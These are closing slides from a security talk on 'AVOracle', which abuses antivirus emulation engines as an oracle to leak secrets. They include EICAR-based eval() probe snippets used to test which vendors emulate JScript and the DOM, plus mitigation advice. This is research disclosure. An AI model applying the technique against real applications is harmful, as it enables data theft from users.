###  [Targeting other antivirus • VirusTotal is the best friend :)](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_41.jpg)

 • Which antivirus suppoorts JScript emulator? ◦ eval('EICA'+'R'); // should be detected ◦ eval('EICA'+'#'); // should not be detected • 4 antivirus passed ◦ Cyren ◦ DrWeb ◦ Microsoft ◦ NANO-Antivirus • TrendMicro ◦ false positive

-

###  [Targeting other antivirus • Further testing • Which antivirus supports](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_42.jpg)

 DOM API? ◦ eval('EICA'+innerHTML[0]);<body>R</body> // should be detected ◦ eval('EICA'+innerHTML[0]);<body>#</body> // should not be detected • Only Microsoft passed ◦ That's why they are vulnerable to AVOracle • SUPERAntiSpyware ◦ false positive

-

###  [Windows Defender is too smart](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_43.jpg)

-

###  [How to prevent this attack? • IMO: no generic way](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_44.jpg)

 to patch ◦ standard behavior, not vulnerability • Disable auditor engine is one way ◦ Chromium XSS auditor is removed ◦ but Microsoft would not remove the engine • Application developers should ... ◦ know about this attack ◦ not save secret with controllable data • … but it is not developer's fault! ◦ Antivirus vendor should take care about that

-

###  [Conclusions • Auditor Based Oracle is everywhere ◦ Antivirus is](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_45.jpg)

 one big example ◦ it would be oracle if it has intelligent engine • Windows Defender is too smarter than other antivirus ◦ resulted in an eﬀective oracle ◦ more smarter engine will get more oracles • Antivirus behavior would be sometimes harmful ◦ not only data leakage, also DoS • DO NOT store any secret surrounded by user input ◦ or your application would be vulnerable to AVOracle

-

###  [Any Questions? @t0nk42 icchy](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_46.jpg)
